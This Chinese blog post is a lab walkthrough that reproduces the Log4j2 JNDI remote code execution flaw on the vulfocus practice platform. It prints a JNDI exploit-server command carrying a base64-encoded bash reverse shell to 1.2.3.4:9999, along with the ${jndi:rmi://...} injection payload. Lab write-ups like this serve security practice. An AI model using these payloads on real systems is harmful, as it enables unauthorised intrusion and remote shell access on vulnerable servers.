首页 > 技术文章 > Apache Log4j2-任意代码执行-漏洞复现(弹shell)

bflw 2021-12-14 14:59 原文

0x0 前言

相信大家都不陌生,log4j2 ,核弹级漏洞,2021年12月9日,国内多家机构监测到Apache Log4j存在任意代码执行漏洞,并紧急通报相关情况。由于Apache Log4j存在递归解析功能,未取得身份认证的用户,可以从远程发送数据请求输入数据日志,轻松触发漏洞,最终在目标上执行任意代码。

0x01 环境搭建

这里直接用vulfocus了,还是比较全的

地址:http://vulfocus.fofa.so

 

 

 

漏洞地址,和简单描述

0x02 漏洞复现

访问 http://vulfocus.fofa.so:48534/hello

抓包

然后用vps 起jndi 和nc监听

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "1.2.3.4"

 这里根据自己jdk版本使用payload

改包

payload=${jndi:rmi://xxx:1099/yx1rbe}  //多试几个

发包后看jndi监听流量

然后再看nc

现在已经拿到shell,解题自己找下flag,提交就OK了。

 

推荐阅读